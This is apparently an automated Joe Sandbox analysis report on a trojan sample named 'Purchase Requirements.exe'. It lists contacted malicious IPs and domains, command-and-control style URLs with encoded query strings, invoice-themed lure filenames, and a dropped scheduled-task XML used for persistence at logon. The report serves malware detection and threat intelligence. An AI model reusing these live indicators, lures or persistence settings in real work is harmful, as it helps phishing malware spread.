                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designersexplorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.goodfont.co.krPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.carterandcone.comlPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sajatypeworks.comPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.typography.netDPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/cThePurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://fontfabrik.comPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.founder.com.cn/cnPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cna-e5Purchase Requirements.exe, 00000000.00000003.658402247.00000000009DB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.founder.com.cn/cn/-e5Purchase Requirements.exe, 00000000.00000003.658484040.00000000009DB000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleasePurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnaPurchase Requirements.exe, 00000000.00000003.658484040.00000000009DB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.%s.comPAexplorer.exe, 00000008.00000000.733281418.0000000002B50000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    low
                                                    http://www.founder.com.cn/cnn-uPurchase Requirements.exe, 00000000.00000003.658349095.00000000009DB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fonts.comPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com8Purchase Requirements.exe, 00000000.00000002.688507920.00000000009D0000.00000004.00000040.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.comionoBPurchase Requirements.exe, 00000000.00000002.688507920.00000000009D0000.00000004.00000040.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.urwpp.deDPleasePurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase Requirements.exe, 00000000.00000002.693037255.0000000002851000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sakkal.comPurchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        217.160.0.129
                                                        www.braun-mathematik.onlineGermany
                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                        160.153.136.3
                                                        narrowpathwc.comUnited States
                                                        21501GODADDY-AMSDEtrue
                                                        23.227.38.74
                                                        shops.myshopify.comCanada
                                                        13335CLOUDFLARENETUStrue
                                                        34.102.136.180
                                                        teamtacozzzz.comUnited States
                                                        15169GOOGLEUSfalse
                                                        162.241.85.227
                                                        mariasmoworldwide.comUnited States
                                                        26337OIS1UStrue
                                                        74.208.236.212
                                                        www.mynjelderlaw.comUnited States
                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                        General Information

                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                        Analysis ID:458827
                                                        Start date:03.08.2021
                                                        Start time:19:25:10
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 11m 21s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:Purchase Requirements.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:22
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@10/4@8/6
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 59.6% (good quality ratio 53.9%)
                                                        • Quality average: 72.2%
                                                        • Quality standard deviation: 32.2%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.114.76.34, 23.211.6.115, 40.88.32.150, 20.82.210.154, 93.184.221.240, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, browser.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, skypedataprdcolneu02.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, browser.pipe.aria.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        19:26:10API Interceptor1x Sleep call for process: Purchase Requirements.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        217.160.0.129Purchase Requirements.exeGet hashmaliciousBrowse
                                                        • www.braun-mathematik.online/n8ba/?U8L=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WF0lx3J1iO&oXTp_f=5joHJFap7tcH7lo
                                                        160.153.136.3Purchase Requirements.exeGet hashmaliciousBrowse
                                                        • www.narrowpathwc.com/n8ba/?U8L=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8FObh2ftta&oXTp_f=5joHJFap7tcH7lo
                                                        i9Na8iof4G.exeGet hashmaliciousBrowse
                                                        • www.greenmommarket.com/wufn/?-ZYx-=logrQKqfHyiXoC6u9q1z/5ZQb95Ly1nqc2eREaPunu1Gh2txwcVTY6nqqNGtg45wUb8TCH42Ew==&7n=pDKh8nopV2b0
                                                        M7ZGK4fBfl.exeGet hashmaliciousBrowse
                                                        • www.solanohomebuyerclass.com/wufn/?p8=+zzRrn2Jzburp+jId/o3ZSAnv7QTnqViuhoXO7jDMKz7r0VxysMHsmA+3Xbptm7b0wxl&w6A=TBaP_0V
                                                        altnp3zI5hfg3Eg.exeGet hashmaliciousBrowse
                                                        • www.fleetrepsusa.com/c8ec/?w4Tdkvu=9I7a+LkwhDOpbSdRmgLKj7YUi0+gkhrBaOjYaoeXfQTs328/PNb+MTW5/2v14VkyqELt&0tBP=A2MthVh0Ib
                                                        gqdJ6f9axq.exeGet hashmaliciousBrowse
                                                        • www.solanohomebuyerclass.com/wufn/?f8TPbh=+zzRrn2Jzburp+jId/o3ZSAnv7QTnqViuhoXO7jDMKz7r0VxysMHsmA+3XXp+23Ytgxz0Wr52Q==&mVEhB=4hPxHDz
                                                        YaRh8PG41y.exeGet hashmaliciousBrowse
                                                        • www.solanohomebuyerclass.com/wufn/?EZwxI0z8=+zzRrn2Jzburp+jId/o3ZSAnv7QTnqViuhoXO7jDMKz7r0VxysMHsmA+3U7T93bjuXQi&WH=3fuXGd
                                                        Invoice #210722 14,890 $.exeGet hashmaliciousBrowse
                                                        • www.devgmor.com/p4se/?j8kTd=3AjxmcTV9CpC7ma+KZzcwnt78JTs581Yvjd5X9kjXN7jRP25zy6AppwRbNNJJuhTk5qu&Xl=8ptXsvhhshn
                                                        4bTTNoUZaa.exeGet hashmaliciousBrowse
                                                        • www.stgilespantry.com/p1nr/?b2MTsl=ro1pg1icPIWuRHVdGE2GvVgViR5v9blhYS2FJX1ENzfO1JI0TR6XWI0VOyA4arV/CJV4&2dZxIR=0ZlXBzE
                                                        Inv_7623980.exeGet hashmaliciousBrowse
                                                        • www.lknstump.com/m6b5/?9rVDIvo=rWikOFXpygEHOZjjfkCnxP9a/ZXJk6EyrkIACG+bBDgTAbiGY8SkU9OA/zeFMxKBprcl0NW5Ng==&4h=Dtxh6
                                                        lono.exeGet hashmaliciousBrowse
                                                        • www.wildhare.media/p6f2/?6lJtGz=ulND+mfPfZM3TEZ6QOWqJ+LX2fjJHiUEC/2pzj9QTBw/bc1md+4EggpglePfLQjQl3JI&f4XT4F=o8O8TFa8yH_4hD
                                                        sVhrjyN0LY.exeGet hashmaliciousBrowse
                                                        • www.surreal-myzrael.com/z7a/?9rBL=_PRdJjRHwRY0_XGP&fHPxoNd=CJ0IYPhq9Te1v77fkroO5P+gqdD228oGYQKo6kedtkHwI7v6REInoBoe7rK5QEPnUSLt
                                                        O064MLWqHI.exeGet hashmaliciousBrowse
                                                        • www.surreal-myzrael.com/z7a/?j8F=CJ0IYPhq9Te1v77fkroO5P+gqdD228oGYQKo6kedtkHwI7v6REInoBoe7rKTP0/nQQDt&fPA8hN=BvJp
                                                        SecuriteInfo.com.W32.AIDetect.malware2.14010.exeGet hashmaliciousBrowse
                                                        • www.elegantloungebyjvs.com/ymmi/?oN6t-8f=1p4gRrVEFb86tvtItZMKPsw5HPj5Oz/VmIsMLmGDGi1zj6MJ3i/lxOX+936yGubJw/y2&TladAF=1bfpaFH8
                                                        OpqhGKdDwO.exeGet hashmaliciousBrowse
                                                        • www.solanohomebuyerclass.com/wufn/?5jzlX=A6R8FpVPJ&k0DLuPK=+zzRrn2Jzburp+jId/o3ZSAnv7QTnqViuhoXO7jDMKz7r0VxysMHsmA+3Xbptm7b0wxl
                                                        QUOTE.0050.exeGet hashmaliciousBrowse
                                                        • www.aredntech.com/cca/?5jo8svvx=Bzw7gyC/uaQZ+FCJq4Sehmh3S9S7zNEczwhXj6XE9nE49JOjciyaRx/bk3qZPQGZwiEH&m0Dx=Qvyp
                                                        MGoJ7XfFzA.exeGet hashmaliciousBrowse
                                                        • www.inspiredpractice.net/csls/?TF=AA0fyBWZEga4qdBKI0jA8QbX+M95wQKAQ1mAilVom1Vuw05GTURTt5L/csoETBCAz87VsV938g==&4hEp3=5jOTrpsh4f
                                                        Requiremnet -Jun-2021.exeGet hashmaliciousBrowse
                                                        • www.valuepreneurshafeeq.com/ce0a/?6lIx=pw7IlJhxr1NIn5+5eBapwH2jf8zpofqDtRSQ2wj2HyOh1rqWCq3WOF+C6/I5D07jcWV9&vJ=dR-T2hLh6xi8x
                                                        NpsklpjhrybdSWIFT-Kopie ejpswlorisqr.exeGet hashmaliciousBrowse
                                                        • www.getoffyourhighhorses.com/n7ak/?ijIXGh1=BMm8edGK58tVuwDLBJVJAih/uCeFZfzQg7uqlyXo87QYP7NZp31jN1nLLedeJDmije/w&WpiX1=9r5d92_H1jGt
                                                        Request For Quotation.exeGet hashmaliciousBrowse
                                                        • www.bellaflowersart.com/o84d/?PP98=9rQL&m85xfn=yYkB3wmhfvHMIiQRUOa8ICcqqSG4n+AdDrOTdgJhsr9L6KAJDsHx+XyPwVr7Spl4ybb4NHl2OQ==
                                                        RFQ-Itachi Terminal Solutions Korea #Ubc1c#Uc8fc#Uc11c nf 21-0649 (#Ud68c#Uc2e0#Uc694#Ub9dd).exeGet hashmaliciousBrowse
                                                        • www.thefullright.com/o84d/?TXQ=jF51LQoAA/K6hdRukSQmjm/ceUqFXdGLFEEIBECHTdtR/yjD+ewsgge0mKwFyRA8+SIqY0aiGA==&e48x=MpNHFHq0i2ylUT_0

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        www.braun-mathematik.onlinePurchase Requirements.exeGet hashmaliciousBrowse
                                                        • 217.160.0.129
                                                        shops.myshopify.comForm_TT_EUR57,890.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        payment copy.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        PO_0008.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        i9Na8iof4G.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        bin.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        RYP-210712.xlsxGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        auhToVTQTs.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        kKTeUAtiIP.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        Invoice Amount 14980.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        W7f.PDF.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        MR# RFx 21-2034021.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        AWB & Shipping Tracking Details.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.docGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        Nsda7LTM1x.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        ORDER78827.docGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        D3ccF8FfwAXrqsU.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        ONEANDONE-ASBrauerstrasse48DEPaymentAdvice.exeGet hashmaliciousBrowse
                                                        • 217.160.0.109
                                                        Form_TT_EUR57,890.xlsxGet hashmaliciousBrowse
                                                        • 217.160.0.46
                                                        PO64259,pdf.exeGet hashmaliciousBrowse
                                                        • 217.160.0.157
                                                        ORDER_0009_PDF.exeGet hashmaliciousBrowse
                                                        • 74.208.236.251
                                                        INVOICE_0002_PDF.exeGet hashmaliciousBrowse
                                                        • 74.208.236.251
                                                        Purchase Requirements.exeGet hashmaliciousBrowse
                                                        • 217.160.0.129
                                                        QVwfduoULs.exeGet hashmaliciousBrowse
                                                        • 217.160.0.194
                                                        QT2WO09000008.PDF.exeGet hashmaliciousBrowse
                                                        • 212.227.15.158
                                                        QUOTATION LIST FOR NEW ORDER 8121.exeGet hashmaliciousBrowse
                                                        • 82.223.107.237
                                                        Payment.exeGet hashmaliciousBrowse
                                                        • 217.76.156.252
                                                        Medical Equipment Order 2021.PDF.exeGet hashmaliciousBrowse
                                                        • 74.208.236.102
                                                        fzyVEFy0O2.exeGet hashmaliciousBrowse
                                                        • 217.160.0.194
                                                        900020449_0724_T502071.exeGet hashmaliciousBrowse
                                                        • 74.208.236.163
                                                        X54kf4zSf8.exeGet hashmaliciousBrowse
                                                        • 74.208.5.20
                                                        7cQuHxOrXh.exeGet hashmaliciousBrowse
                                                        • 217.160.0.106
                                                        nKfPRJL4kW.exeGet hashmaliciousBrowse
                                                        • 74.208.5.20
                                                        PurchaseOrder.exeGet hashmaliciousBrowse
                                                        • 74.208.236.40
                                                        MfPeGpGTvm.exeGet hashmaliciousBrowse
                                                        • 217.160.0.254
                                                        0ictba3ik3lrJnW.exeGet hashmaliciousBrowse
                                                        • 109.228.60.45
                                                        hqIfi6P2KJ.exeGet hashmaliciousBrowse
                                                        • 217.160.0.194
                                                        GODADDY-AMSDENew order.xltxGet hashmaliciousBrowse
                                                        • 160.153.129.234
                                                        statement.exeGet hashmaliciousBrowse
                                                        • 160.153.246.81
                                                        Purchase Requirements.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        Invoice no SS21-22185.exeGet hashmaliciousBrowse
                                                        • 160.153.246.81
                                                        i9Na8iof4G.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        2129-20 30% CLAIM - PO SPO21-01-072.exeGet hashmaliciousBrowse
                                                        • 160.153.16.6
                                                        AMxAyl1FvN.docGet hashmaliciousBrowse
                                                        • 160.153.208.149
                                                        M7ZGK4fBfl.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        altnp3zI5hfg3Eg.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        gqdJ6f9axq.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        YaRh8PG41y.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        2129-20 30% CLAIM - PO SPO21-01-072.exeGet hashmaliciousBrowse
                                                        • 160.153.16.6
                                                        Invoice #210722 14,890 $.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        SCAN_Wells Fargo bank payment.exeGet hashmaliciousBrowse
                                                        • 160.153.133.86
                                                        PO.exeGet hashmaliciousBrowse
                                                        • 160.153.246.81
                                                        4bTTNoUZaa.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        Inv_7623980.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        lono.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3
                                                        mixazed_20210723-183439.exeGet hashmaliciousBrowse
                                                        • 188.121.43.27
                                                        sVhrjyN0LY.exeGet hashmaliciousBrowse
                                                        • 160.153.136.3

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Requirements.exe.log
                                                        Process:C:\Users\user\Desktop\Purchase Requirements.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                        C:\Users\user\AppData\Local\Temp\tmp47B.tmp
                                                        Process:C:\Users\user\Desktop\Purchase Requirements.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1645
                                                        Entropy (8bit):5.190982278193099
                                                        Encrypted:false
                                                        SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGr1tn:cbhK79lNQR/rydbz9I3YODOLNdq3K/
                                                        MD5:1632FD5738B2BFF0BA6FF92B00A75565
                                                        SHA1:AB1A6F4AEDB3B7481F074645BE85937BB9485A92
                                                        SHA-256:FF4D4051F9AB9EB29712EC6BACD839F99A7DBB8EE59B6F6A03D7CF9F4FC6AC29
                                                        SHA-512:E4729CDD23A2D0673EA8658CFF8CC05F7445315735773B431A0D2F9B5DAA0C6616B6AFE52C47DD17A8570D33709B7E79952C69937F2676A7EA3A81069546CD9A
                                                        Malicious:true
                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                        C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe
                                                        Process:C:\Users\user\Desktop\Purchase Requirements.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):774656
                                                        Entropy (8bit):7.3718333645387135
                                                        Encrypted:false
                                                        SSDEEP:12288:W7Sx46OinbMVOfLrnCVvfoF2m2qdkQX6tpgWS6fSYTZ5wzTaQ12iN:ISxxHbyOjrnCVoFEe6QY5V5QaQ11
                                                        MD5:5BD387D81D1D7D7FD4DBEABEBBB46B1B
                                                        SHA1:A832689604786E188BCC5C9020C28F693B2EB460
                                                        SHA-256:FE7E173FD8A3D646508573BB2F7EF52F7EFD25A8E2AEF1B754DCF95CEB797F8A
                                                        SHA-512:DDD4164C8C94D9B3DA6D78293F148EC39F8128B2A7DE7092EA2EBB42F92D81D3ABE1B6586F8C4F7F83144F06109EEE93D2409B46E56544D3917BE3EC49B7C24C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P.............&.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...,.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........................8............................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....o^...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....+..*.0......
                                                        C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe:Zone.Identifier
                                                        Process:C:\Users\user\Desktop\Purchase Requirements.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview: [ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
